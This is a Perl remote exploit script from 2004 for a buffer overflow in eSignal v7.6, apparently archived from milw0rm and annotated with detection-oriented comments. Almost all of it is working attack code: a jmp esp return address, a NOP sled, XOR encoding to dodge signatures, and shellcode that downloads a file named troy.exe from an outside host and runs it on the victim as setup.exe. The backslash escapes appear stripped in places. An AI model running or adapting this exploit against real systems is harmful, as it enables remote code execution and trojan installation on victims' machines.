#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-mAR-2004
#
use IO::Socket;
# Abort with a one-line usage banner; called when host or port is missing
# from @ARGV. Never returns.
sub usage
{
    my $banner = sprintf "nUsage: perl %s host portn", $0;
    die $banner;
}
#
# Main script. Builds one request body and hands it to sendraw() below,
# which makes a single TCP connection to host:port and writes it. What the
# target receives is exactly $data as it stands just before the
# sendraw() call: a '<STREAMQUOTE>' ... '</STREAMQUOTE>' record wrapping a
# fixed-size binary body. For network detection, the literal tags around an
# unusually long, mostly non-printable body are the stable artifact; the
# encoded strings inside it are not (see the XOR note further down).
#
print "rneSignal v7.6 remote exploit, (c) VizibleSoft.comrn";
# Both are file-scope lexicals that sendraw() reads directly rather than
# taking as parameters.
my $ip = $ARGV[0] || usage();
my $port = $ARGV[1] || usage();
my $data = "";
my $ret = "xf3x7bx20x7c"; # MFC71.dll "jmp esp"
my $nop = "x90";
#
# Used api..
#
# From here on the file assigns package globals ($api, $url, $fname,
# $shellc, $movsb, $shellcode) -- there is no `use strict` in this file.
$api = "x00wininet.dllx00InternetOpenAx00".
"InternetOpenUrlAx00InternetReadFilex00kernel32.dllx00".
"_lcreatx00_lwritex00_lclosex00";
#
# Url of file to execute
#
$url = "http://viziblesoft.com/insect/sploits/troy.exe";
#
#
# Filename for our file on remote system
# Interpolated into the tail of $shellc below; that block is never encoded,
# so this name crosses the wire in cleartext. Per the author's comments,
# the payload is meant to write the fetched file under this name on the
# target and run it -- a host-side indicator to look for, if confirmed.
$fname = "setup.exe";
#
#
# Shellcode: downloads and executes file at URL
#
$shellc = "x90".
"x8BxECx03xEAxB8xEAxFExFFxFFxF7xD0x03xE8x83xC5x0Bx8BxFDx4FxF7".
"x17x83xC7x04x83x3FxFFx7CxF6xF7x17xB8x5Cx12x14x7Cx8Bx18x55xFF".
"xD3x8BxF8x33xC9xB1x03x8Dx55x0CxB8x58x12x14x7Cx8Bx18x51x52x52".
"x57xFFxD3x5Ax59x89x02x83xC2x03x42x8Ax02x3AxC5x7FxF9x42xFExC9".
"x3AxCDx7FxDExB8x5Cx12x14x7Cx8Bx18x8Dx55x3Cx52xFFxD3x8BxF8xB8".
"x58x12x14x7Cx8Bx18x53x8Dx55x49x52x52x57xFFxD3x5Ax89x02x8Bx1C".
"x24x8Dx55x51x52x52x57xFFxD3x5Ax89x02x5Bx8Dx55x59x52x52x57xFF".
"xD3x5Ax89x02x33xD2x52x52x52x52x55xFFx55x0Cx33xD2x52xB6x80xC1".
"xE2x10x52x33xD2x52x52x8Dx4Dx60x41x51x50xFFx55x1Ax89x45x1Ax33".
"xD2x52x8Dx55xF6x52xFFx55x49x89x45x49x33xD2xB6x02x2BxE2x83xEC".
"x04x33xD2xB6x02x54x8BxC4x83xC0x08x52x50x8Bx45x1Ax50xFFx55x2B".
"x8Bx04x24x8Dx54x24x04x50x52x8Bx45x49x50xFFx55x51x83x3Cx24x01".
"x7DxD7x8Bx45x49x50xFFx55x59x8Dx55xF6x52xB8x3Fx0Ex81xF8x35x80".
"x80x80x80xFFxD0xB8xD3xFCx80xF8x35x80x80x80x80xFFxE0$fname";
$movsb = "x90x33xc9xb5x02xb1xccx8bxf4x2bxf1x8bxfcx33xd2xb2x15x03xfaxf3xa4";
#
# xor data block
#
# Only the concatenated $api . $url is encoded here (character-wise XOR
# against a fixed key), so the DLL/API names and the download URL do not
# appear literally in the traffic and signatures keyed on them will miss.
# $shellc and $movsb are appended unencoded.
$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
$data = $data . (substr($url, $i, 1) ^ "xff");
};
$data .= "xffxffxfexfexffxffxffxff";
#
# construct overflow string...
#
$shellc .= $data;
$shellc .= ("xcc" x (712 - length($shellc)));
$shellcode = $nop x (8 * 16) .
$shellc .
$ret .
$movsb .
$nop x (191-16);
# print "shellcode len: " . length($shellcode) . "rn";
# Final wire format: the body is the only thing written to the socket.
$data = '<STREAMQUOTE>' . $shellcode . '</STREAMQUOTE>';
# print "sending data of len: " . length($data) . "n";
print sendraw($data);
# Printed unconditionally once sendraw() returns; nothing here checks the
# response, so this line says nothing about what the target actually did.
print "[+] Overflow sent / file executed!n";
exit;
sub sendraw {
# Opens one TCP connection to the host/port given on the command line
# ($ip and $port are file-scope variables, not parameters), writes $pstr
# to it, reads the peer's reply to EOF and returns those lines as a list.
# Every failure path dies rather than returning an error indicator.
#
# Style note: bareword handle S, numeric socket constants and a
# hand-packed sockaddr_in, although IO::Socket is loaded at the top of the
# file and never used.
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("[-] inet_aton problems");
# 2 and 1 are presumably AF_INET and SOCK_STREAM (platform-dependent
# numeric values); protocol falls back to 0 if 'tcp' is not in the
# protocol database.
socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket problemsn");
# "SnA4x8": address family as a native short, port in network byte order,
# the 4-byte IPv4 address, then 8 zero bytes of padding -- a sockaddr_in
# assembled by hand.
if(connect(S,pack "SnA4x8",2,$port,$target)){
# Make S the default output handle and turn on autoflush for it, so the
# unqualified print below goes to the socket rather than STDOUT.
select(S); $|=1;
print $pstr; my @in=<S>;
# Restore STDOUT as the default handle before closing the socket.
select(STDOUT); close(S);
return @in;
} else { die("[-] Can't connect...n"); }}
# milw0rm.com [2004-03-26]